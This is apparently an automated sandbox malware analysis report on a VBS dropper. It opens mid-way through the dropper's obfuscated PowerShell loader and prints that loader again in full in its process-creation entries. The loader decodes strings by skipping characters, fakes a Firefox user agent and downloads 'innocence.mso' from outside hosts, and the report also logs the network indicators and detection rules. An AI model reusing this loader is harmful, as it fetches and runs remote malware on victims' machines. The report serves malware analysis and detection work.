Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gteaSpartl+ Besvr$Ov,rcoB,eboeleHornhiVI terpB infee
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6436, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      • AV Detection
      • Compliance
      • Software Vulnerabilities
      • Networking
      • System Summary
      • Data Obfuscation
      • Hooking and other Techniques for Hiding and Protection
      • Malware Analysis System Evasion
      • HIPS / PFW / Operating System Protection Evasion
      • Language, Device and Operating System Detection

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Blikvarefabrikken.vbsVirustotal: Detection: 8%Perma Link
      Source: Submited SampleNeural Call Log Analysis: 99.5%
      Source: unknownHTTPS traffic detected: 146.88.26.238:443 -> 192.168.2.9:49683 version: TLS 1.2
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb> source: powershell.exe, 00000007.00000002.2116725870.0000000007E36000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2116725870.0000000007E36000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.Core.pdb# source: powershell.exe, 00000007.00000002.2106847629.0000000006D58000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Networking

      barindex
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global trafficHTTP traffic detected: GET /images/innocence.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: karunavriksha.orgConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /images/innocence.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: karunavriksha.orgConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: karunavriksha.org
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.o
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.or
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/s
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/se
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/sea
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/sear
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/searc
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/i
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/in
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/inn
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/inno
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innoc
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innoce
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innocen
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innocenc
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innocence
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innocence.
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innocence.m
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innocence.ms
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innocence.mso
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhalalasia.org/search/innocence.msoP
      Source: svchost.exe, 00000009.00000002.2339023640.0000019942800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: svchost.exe, 00000009.00000003.1203845695.0000019942670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://karunavriksha.org
      Source: powershell.exe, 00000004.00000002.1143648343.000001AF90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000041A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000007.00000002.2081602385.00000000041A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB;r
      Source: powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: svchost.exe, 00000009.00000003.1203845695.00000199426A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
      Source: svchost.exe, 00000009.00000003.1203845695.0000019942670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
      Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.o
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.or
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/i
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/im
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/ima
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/imag
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/image
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/i
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/in
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/inn
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/inno
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/innoc
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/innoce
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/innocen
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/innocenc
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/innocence
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/innocence.
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/innocence.m
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/innocence.ms
      Source: powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/innocence.mso
      Source: powershell.exe, 00000004.00000002.1155363014.000001AFFE170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://karunavriksha.org/images/innocence.msolb
      Source: powershell.exe, 00000004.00000002.1143648343.000001AF90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
      Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
      Source: unknownHTTPS traffic detected: 146.88.26.238:443 -> 192.168.2.9:49683 version: TLS 1.2

      System Summary

      barindex
      Source: amsi32_6456.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 6560, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 6456, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A g
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Philologer='func';Get-History;$Philologer+='t';Get-History;$Philologer+='i';$Stttevvenes=Get-History;$Philologer+='on:';$Stttevvenes=Get-History;(ni -p $Philologer -n Emissionskursers -value { param($Flavourfully);$Modstillingens=6;do {$Metallographically+=$Flavourfully[$Modstillingens];$Modstillingens+=7} until(!$Flavourfully[$Modstillingens])$Metallographically});(ni -p $Philologer -n Meyers -value {param($Gestikulerende);.($Hjlpelsestes) ($Gestikulerende)});ConvertTo-Html;$Unlaboring=Emissionskursers 'MaanedNWro,gieRapturtUst la.EmbersW';$Unlaboring+=Emissionskursers ' Ghe tEHhvsysbModstacSlightLRykke IS.lvove TransnUvir,eT';$Splser=Emissionskursers 'revaliMRappegoHeliorzHo,fbeiregteulSedestlOverasaPred.c/';$Tilbindes=Emissionskursers 'FrenesTA arthlEcuadosReg,on1 Holly2';$Xenon='Sahari[Zigge,N andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF9C1D0B5FA4_2_00007FF9C1D0B5FA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF9C1D0C3AA4_2_00007FF9C1D0C3AA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF9C1DD678D4_2_00007FF9C1DD678D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF9C1DDBEDA4_2_00007FF9C1DDBEDA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00B56F687_2_00B56F68
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00B56F687_2_00B56F68
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08721B4F7_2_08721B4F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0872647D7_2_0872647D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_087204F97_2_087204F9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0872048A7_2_0872048A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_087225A97_2_087225A9
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08724E517_2_08724E51
      Source: Blikvarefabrikken.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8124
      Source: unknownProcess created: Commandline size = 8124
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8124Jump to behavior
      Source: amsi32_6456.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 6560, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 6456, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@14/11@1/2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Motorgadens.AlbJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt4on5nb.lj2.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Blikvarefabrikken.vbs"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6560
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6456
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Blikvarefabrikken.vbsVirustotal: Detection: 8%
